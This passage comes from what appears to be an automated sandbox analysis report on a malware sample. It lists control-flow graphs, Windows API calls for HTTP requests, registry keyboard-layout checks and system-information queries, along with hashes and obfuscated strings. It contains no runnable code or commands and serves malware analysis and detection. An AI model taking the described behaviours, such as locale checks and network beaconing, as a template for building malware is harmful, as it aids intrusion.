                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 009CBF9D
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000003FF,?,?,?,?,?), ref: 009CC051
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 009CC077
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 009CC07F
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 009CC087
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                                                                                                                                                                                          • String ID: 9wGTaHilQw==$9wGTaLGWQy9=$SbKm$StYMTE==$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 1354133546-230317815
                                                                                                                                                                                                                                          • Opcode ID: cfae0d33e3f36eeaa4c7e76b43685ca6003f9fe4b761c307a7b4db3f7cce8d0d
                                                                                                                                                                                                                                          • Instruction ID: c766fd96bc6bd625d2a77946a805caf8e580ec0fa415c3d4fc3bb7be929a45c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfae0d33e3f36eeaa4c7e76b43685ca6003f9fe4b761c307a7b4db3f7cce8d0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94B1E5B1A001189BDB24DF28CC85BAEBB79EF85304F5045ADF508972D2D7759AC0CF96
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009C23BE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___std_exception_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2659868963-0
                                                                                                                                                                                                                                          • Opcode ID: 3f8f47cfe4027f06d416de88fbe652d1ba10c0653b8f8076bfd6827ac1611ca7
                                                                                                                                                                                                                                          • Instruction ID: c13c4dff7cf65839789baa3db2ba437bfcbaebe722840f10dd252ee387b219bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f8f47cfe4027f06d416de88fbe652d1ba10c0653b8f8076bfd6827ac1611ca7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4151BEB1D026059BDB25CFA9D881BAEB7F9FB18320F24C52BD415EB390D3349942CB60

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 9d3520-9d3559 1 9d355f-9d35af call 9d7f00 0->1 2 9d4130-9d4136 0->2 15 9d35b5-9d35fb call 9d7f00 1->15 16 9d4207 call 9d8040 1->16 3 9d4138-9d4144 2->3 4 9d4164-9d417c 2->4 6 9d415a-9d4161 call 9dd569 3->6 7 9d4146-9d4154 3->7 9 9d417e-9d418a 4->9 10 9d41aa-9d41c2 4->10 6->4 7->6 13 9d4243 call 9f6b7a 7->13 17 9d418c-9d419a 9->17 18 9d41a0-9d41a7 call 9dd569 9->18 11 9d41ec-9d4206 call 9dcef4 10->11 12 9d41c4-9d41d0 10->12 21 9d41e2-9d41e9 call 9dd569 12->21 22 9d41d2-9d41e0 12->22 15->16 33 9d3601-9d363f call 9d7f00 15->33 31 9d420c call 9d8040 16->31 17->13 17->18 18->10 21->11 22->13 22->21 36 9d4211 31->36 33->16 40 9d3645-9d3690 call 9d7f00 call 9d7840 call 9c5b00 33->40 38 9d4216 call 9f6b7a 36->38 39 9d4211 call 9f6b7a 36->39 43 9d421b call 9d8040 38->43 39->38 54 9d3694-9d36c9 call 9d8aa0 40->54 55 9d3692 40->55 47 9d4220 call 9f6b7a 43->47 51 9d4225 call 9f6b7a 47->51 56 9d422a-9d422f call 9dc09c 51->56 54->31 62 9d36cf-9d36fe call 9d7f00 54->62 55->54 60 9d4234 call 9f6b7a 56->60 63 9d4239-9d423e call 9dc0dc 60->63 67 9d372f-9d3754 call 9c9800 62->67 68 9d3700-9d370f 62->68 63->13 75 9d3c38-9d3c3e 67->75 76 9d375a-9d37c2 call 9d7840 call 9c5b00 call 9d7f00 67->76 69 9d3725-9d372c call 9dd569 68->69 70 9d3711-9d371f 68->70 69->67 70->36 70->69 78 9d3c6c-9d3c72 75->78 79 9d3c40-9d3c4c 75->79 112 9d37c4 76->112 113 9d37c6-9d37fd call 9d9370 76->113 80 9d3c74-9d3c80 78->80 81 9d3ca0-9d3ca6 78->81 83 9d3c4e-9d3c5c 79->83 84 9d3c62-9d3c69 call 9dd569 79->84 86 9d3c96-9d3c9d call 9dd569 80->86 87 9d3c82-9d3c90 80->87 88 9d3ca8-9d3cb4 81->88 89 9d3cd4-9d3cec 81->89 83->60 83->84 84->78 86->81 87->60 87->86 93 9d3cca-9d3cd1 call 9dd569 88->93 94 9d3cb6-9d3cc4 88->94 96 9d3d1d-9d3d23 89->96 97 9d3cee-9d3cfd 89->97 93->89 94->60 94->93 96->2 100 9d3d29-9d3d35 96->100 98 9d3cff-9d3d0d 97->98 99 9d3d13-9d3d1a call 9dd569 97->99 98->60 98->99 99->96 105 9d3d3b-9d3d49 100->105 106 9d4126-9d412d call 9dd569 100->106 105->60 111 9d3d4f 105->111 106->2 111->106 112->113 117 9d37ff-9d380a 113->117 118 9d382a-9d3837 113->118 119 9d380c-9d381a 117->119 120 9d3820-9d3827 call 9dd569 117->120 121 9d3839-9d3848 118->121 122 9d3868-9d386f 118->122 119->38 120->118 126 9d385e-9d3865 call 9dd569 121->126 127 9d384a-9d3858 121->127 123 9d3875-9d3897 122->123 124 9d3a33-9d3a63 call 9f7423 call 9f8959 122->124 123->43 129 9d389d-9d38cf call 9d7f00 call 9cac70 123->129 124->56 139 9d3a69-9d3a6c 124->139 126->122 127->38 127->126 142 9d3927-9d3930 129->142 143 9d38d1-9d38d7 129->143 139->63 141 9d3a72-9d3a75 139->141 141->75 144 9d3a7b 141->144 145 9d3961-9d39a1 call 9d7840 * 2 call 9c4940 142->145 146 9d3932-9d3941 142->146 147 9d38d9-9d38e5 143->147 148 9d3905-9d3924 143->148 149 9d3b6d-9d3c2d call 9d7f00 call 9d7840 call 9c5b00 call 9d7840 * 5 call 9d1da0 144->149 150 9d3d54-9d3e1d call 9d7f00 call 9d7840 call 9c5b00 call 9d7840 * 5 144->150 151 9d3a82-9d3b47 call 9d7f00 call 9d7840 call 9c5b00 call 9d7840 * 5 144->151 152 9d3e22-9d3e84 call 9d7840 * 4 call 9d2df0 144->152 189 9d39f9-9d3a02 145->189 190 9d39a3-9d39a9 145->190 153 9d3957-9d395e call 9dd569 146->153 154 9d3943-9d3951 146->154 156 9d38fb-9d3902 call 9dd569 147->156 157 9d38e7-9d38f5 147->157 148->142 241 9d3c32 149->241 238 9d3b4b-9d3b5d call 9d7840 call 9d07c0 150->238 151->238 152->75 153->145 154->47 154->153 156->148 157->47 157->156 189->124 195 9d3a04-9d3a13 189->195 198 9d39ab-9d39b7 190->198 199 9d39d7-9d39f6 190->199 205 9d3a29-9d3a30 call 9dd569 195->205 206 9d3a15-9d3a23 195->206 201 9d39cd-9d39d4 call 9dd569 198->201 202 9d39b9-9d39c7 198->202 199->189 201->199 202->51 202->201 205->124 206->51 206->205 244 9d3b62-9d3b68 238->244 241->75 244->75
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 009D422F
                                                                                                                                                                                                                                            • Part of subcall function 009D7840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 009D792C
                                                                                                                                                                                                                                            • Part of subcall function 009D7840: __Cnd_destroy_in_situ.LIBCPMT ref: 009D7938
                                                                                                                                                                                                                                            • Part of subcall function 009D7840: __Mtx_destroy_in_situ.LIBCPMT ref: 009D7941
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                                                                                                                          • String ID: R2Z$ SBZ$ wNZ$"$246122658369$5120$9LFZ$Gl==$Inhk$LrTsKE==$NvB+$NvF+$WMNZ$WMxZ$WRQd$Wb Z$XM7e$XvPZ$Xvml$a9P=$aRFZ$aSF2aA==$avBZ$bLTZ$bcBZ$e76b71$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 4234742559-736024444
                                                                                                                                                                                                                                          • Opcode ID: 547fc798f89aae976280290cbd21d785547a1f3da9bc743e7f6631773ce31214
                                                                                                                                                                                                                                          • Instruction ID: d94e3faee9411ade59644270f67da15ae2f9adbbf1ac14e26f282f4029eeafb0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 547fc798f89aae976280290cbd21d785547a1f3da9bc743e7f6631773ce31214
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F852F471A002489BDF18EFB8CD8A79DBB75AF85304F90C19DE444A7382D7759A84CF92

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1186 9c5dd0-9c5ece 1192 9c5ef8-9c5f05 call 9dcef4 1186->1192 1193 9c5ed0-9c5edc 1186->1193 1194 9c5eee-9c5ef5 call 9dd569 1193->1194 1195 9c5ede-9c5eec 1193->1195 1194->1192 1195->1194 1197 9c5f06-9c608d call 9f6b7a call 9de060 call 9d7f00 * 5 RegOpenKeyExA 1195->1197 1215 9c6458-9c6461 1197->1215 1216 9c6093-9c6123 call 9f4000 1197->1216 1217 9c648e-9c6497 1215->1217 1218 9c6463-9c646e 1215->1218 1242 9c6129-9c612d 1216->1242 1243 9c6446-9c6452 1216->1243 1223 9c6499-9c64a4 1217->1223 1224 9c64c4-9c64cd 1217->1224 1221 9c6484-9c648b call 9dd569 1218->1221 1222 9c6470-9c647e 1218->1222 1221->1217 1222->1221 1227 9c657e-9c6583 call 9f6b7a 1222->1227 1229 9c64ba-9c64c1 call 9dd569 1223->1229 1230 9c64a6-9c64b4 1223->1230 1225 9c64cf-9c64da 1224->1225 1226 9c64fa-9c6503 1224->1226 1233 9c64dc-9c64ea 1225->1233 1234 9c64f0-9c64f7 call 9dd569 1225->1234 1236 9c652c-9c6535 1226->1236 1237 9c6505-9c6510 1226->1237 1229->1224 1230->1227 1230->1229 1233->1227 1233->1234 1234->1226 1239 9c6537-9c6546 1236->1239 1240 9c6562-9c657d call 9dcef4 1236->1240 1246 9c6522-9c6529 call 9dd569 1237->1246 1247 9c6512-9c6520 1237->1247 1248 9c6558-9c655f call 9dd569 1239->1248 1249 9c6548-9c6556 1239->1249 1250 9c6440 1242->1250 1251 9c6133-9c6167 RegEnumValueW 1242->1251 1243->1215 1246->1236 1247->1227 1247->1246 1248->1240 1249->1227 1249->1248 1250->1243 1256 9c642d-9c6434 1251->1256 1257 9c616d-9c618d 1251->1257 1256->1251 1261 9c643a 1256->1261 1263 9c6190-9c6199 1257->1263 1261->1250 1263->1263 1264 9c619b-9c622d call 9d7c20 call 9d8350 call 9d7840 * 2 call 9c5c40 1263->1264 1264->1256
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                          • API String ID: 0-3963862150
                                                                                                                                                                                                                                          • Opcode ID: 42c582a22785019812d18712d9f41d17e1bf9a148630192bdbd5c4b497c41df9
                                                                                                                                                                                                                                          • Instruction ID: e3f172171c0ef6049848dec658aa24fcf27e196148d351cde8f203c3c838d7dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42c582a22785019812d18712d9f41d17e1bf9a148630192bdbd5c4b497c41df9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE1AD71900258ABEB29DBA4CC8DBDEB779EB04304F5042D9E508A7291DB74AFC4CF52

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1274 9c7ce0-9c7d62 call 9f4000 1278 9c825e-9c827b call 9dcef4 1274->1278 1279 9c7d68-9c7d90 call 9d7840 call 9c5b00 1274->1279 1286 9c7d94-9c7db6 call 9d7840 call 9c5b00 1279->1286 1287 9c7d92 1279->1287 1292 9c7db8 1286->1292 1293 9c7dba-9c7dd3 1286->1293 1287->1286 1292->1293 1296 9c7e04-9c7e2f 1293->1296 1297 9c7dd5-9c7de4 1293->1297 1300 9c7e60-9c7e81 1296->1300 1301 9c7e31-9c7e40 1296->1301 1298 9c7dfa-9c7e01 call 9dd569 1297->1298 1299 9c7de6-9c7df4 1297->1299 1298->1296 1299->1298 1302 9c827c call 9f6b7a 1299->1302 1306 9c7e87-9c7e8c 1300->1306 1307 9c7e83-9c7e85 GetNativeSystemInfo 1300->1307 1304 9c7e56-9c7e5d call 9dd569 1301->1304 1305 9c7e42-9c7e50 1301->1305 1315 9c8281-9c8286 call 9f6b7a 1302->1315 1304->1300 1305->1302 1305->1304 1311 9c7e8d-9c7e96 1306->1311 1307->1311 1313 9c7e98-9c7e9f 1311->1313 1314 9c7eb4-9c7eb7 1311->1314 1317 9c8259 1313->1317 1318 9c7ea5-9c7eaf 1313->1318 1319 9c7ebd-9c7ec6 1314->1319 1320 9c81ff-9c8202 1314->1320 1317->1278 1322 9c8254 1318->1322 1323 9c7ec8-9c7ed4 1319->1323 1324 9c7ed9-9c7edc 1319->1324 1320->1317 1325 9c8204-9c820d 1320->1325 1322->1317 1323->1322 1327 9c81dc-9c81de 1324->1327 1328 9c7ee2-9c7ee9 1324->1328 1329 9c820f-9c8213 1325->1329 1330 9c8234-9c8237 1325->1330 1331 9c81ec-9c81ef 1327->1331 1332 9c81e0-9c81ea 1327->1332 1333 9c7eef-9c7f4b call 9d7840 call 9c5b00 call 9d7840 call 9c5b00 call 9c5c40 1328->1333 1334 9c7fc9-9c81c5 call 9d7840 call 9c5b00 call 9d7840 call 9c5b00 call 9c5c40 call 9d7840 call 9c5b00 call 9c5620 call 9d7840 call 9c5b00 call 9d7840 call 9c5b00 call 9c5c40 call 9d7840 call 9c5b00 call 9c5620 call 9d7840 call 9c5b00 call 9d7840 call 9c5b00 call 9c5c40 call 9d7840 call 9c5b00 call 9c5620 1328->1334 1335 9c8228-9c8232 1329->1335 1336 9c8215-9c821a 1329->1336 1337 9c8239-9c8243 1330->1337 1338 9c8245-9c8251 1330->1338 1331->1317 1340 9c81f1-9c81fd 1331->1340 1332->1322 1359 9c7f50-9c7f57 1333->1359 1374 9c81cb-9c81d4 1334->1374 1335->1317 1336->1335 1342 9c821c-9c8226 1336->1342 1337->1317 1338->1322 1340->1322 1342->1317 1361 9c7f59 1359->1361 1362 9c7f5b-9c7f7b call 9f8a61 1359->1362 1361->1362 1368 9c7f7d-9c7f8c 1362->1368 1369 9c7fb2-9c7fb4 1362->1369 1371 9c7f8e-9c7f9c 1368->1371 1372 9c7fa2-9c7faf call 9dd569 1368->1372 1373 9c7fba-9c7fc4 1369->1373 1369->1374 1371->1315 1371->1372 1372->1369 1373->1374 1374->1320 1376 9c81d6 1374->1376 1376->1327
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 009C7E83
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID: K9pqLk==$K9pqMU==$K9prKk==
                                                                                                                                                                                                                                          • API String ID: 1721193555-747669196
                                                                                                                                                                                                                                          • Opcode ID: 9cbf075f9c17afc24967ca38ff844970ffd1599928eb19a60dcaee87f865bbf0
                                                                                                                                                                                                                                          • Instruction ID: e45a63a354377df7dad85a93597768d26c20db605193b93c05a56950634922a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbf075f9c17afc24967ca38ff844970ffd1599928eb19a60dcaee87f865bbf0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFD12C71E40654ABDB14FB68DD4ABAEBB71AB82310F9042DCE415673C2DB745E818BC3

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1412 9f6de1-9f6e16 GetFileType 1413 9f6ece-9f6ed1 1412->1413 1414 9f6e1c-9f6e27 1412->1414 1417 9f6efa-9f6f22 1413->1417 1418 9f6ed3-9f6ed6 1413->1418 1415 9f6e49-9f6e65 call 9f4000 GetFileInformationByHandle 1414->1415 1416 9f6e29-9f6e3a call 9f7157 1414->1416 1428 9f6eeb-9f6ef8 call 9f73ed 1415->1428 1433 9f6e6b-9f6ead call 9f70a9 call 9f6f51 * 3 1415->1433 1430 9f6ee7-9f6ee9 1416->1430 1431 9f6e40-9f6e47 1416->1431 1419 9f6f3f-9f6f41 1417->1419 1420 9f6f24-9f6f37 1417->1420 1418->1417 1423 9f6ed8-9f6eda 1418->1423 1425 9f6f42-9f6f50 call 9dcef4 1419->1425 1420->1419 1436 9f6f39-9f6f3c 1420->1436 1427 9f6edc-9f6ee1 call 9f7423 1423->1427 1423->1428 1427->1430 1428->1430 1430->1425 1431->1415 1448 9f6eb2-9f6eca call 9f7076 1433->1448 1436->1419 1448->1419 1451 9f6ecc 1448->1451 1451->1430
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 009F6E03
                                                                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 009F6E5D
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 009F6EF2
                                                                                                                                                                                                                                            • Part of subcall function 009F7157: __dosmaperr.LIBCMT ref: 009F718C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
